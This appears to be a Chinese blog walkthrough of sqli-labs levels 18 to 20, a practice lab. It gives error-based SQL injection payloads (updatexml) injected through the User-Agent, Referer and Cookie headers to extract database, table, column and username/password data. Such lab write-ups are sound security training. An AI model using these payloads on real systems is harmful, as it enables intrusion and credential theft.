Bootstrap

sqli-labs通关攻略(Less-18~Less-20)

Less-18

使用Burp Suite抓包

发送到重放器

Less-18闭合

Less-18查询库名

User-Agent:1' and updatexml(1,concat(1,database()),1) and'

 

Less-18查询表名

User-Agent:1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

 Less-18查询字段

User-Agent:1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

 

Less-18查询数据

User-Agent:1' and updatexml(1,concat(1,(select group_concat(username,'~',password) from users)),1) and'

 

 由于长度限制,一个一个试

User-Agent:1' and updatexml(1,concat(1,(select concat(username,'~',password) from users limit 0,1)),1) and'

 

Less-19

 

 使用Burp Suite抓包

Less-19闭合

 Referer: http://192.168.112.67/sqli/Less-19/'

 

Less-19查询库名

Referer: http://192.168.112.67/sqli/Less-19/'and updatexml(1,concat(1,database()),1) and'

Less-19查询表名

Referer: 1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and'

Less-19查询字段

Referer: 1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and '

Less-19查询数据

Referer: 1' and updatexml(1,concat(1,(select group_concat(username,'~',password) from users)),1) and '

  

由于长度限制,一个一个试

Referer: 1' and updatexml(1,concat(1,(select concat(username,'~',password) from users limit 0,1)),1) and '

 

Less-20

使用admin登录返回cookie信息

使用Burp Suite抓包

 

Less-20闭合

 Cookie: uname=admin' 

 

Less-20查询库名

Cookie: uname=admin' and updatexml(1,concat(1,database()),1) and '

Less-20查询表名

 Cookie: uname=admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and '

 

Less-20查询字段

 Cookie: uname=admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and '

 

Less-20查询数据

Cookie: uname=admin' and updatexml(1,concat(1,(select group_concat(username,'~',password) from users)),1) and '

 

由于长度限制,一个一个试

Cookie: uname=admin' and updatexml(1,concat(1,(select concat(username,'~',password) from users limit 0,1)),1) and '

 

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

最新收录
第八节,配置分布式TensorFlow
基于Dancing Links的精确覆盖算法(解决NP难问题)和量子计算机模拟中的Shor算法(涉及数论与量子叠加态模拟)
华为OD机试C卷-- 最长子字符串的长度(二)(Java & JS & Python & C)
Java Web从入门到实战
ubuntn系统下cuda+cudnn安装教程
SSM餐厅点餐系统--02635(免费领源码)可做计算机毕业设计JAVA、PHP、爬虫、APP、小程序、C#、C++、python、数据可视化、大数据、全套文案
.NET Core微服务之基于Jenkins+Docker实现持续部署(Part 1)
基于微信小程序的电影交流平台小程序的设计与实现
【Qt笔记】QListWidget控件详解
灰色预测:原理、建模与实战应用
;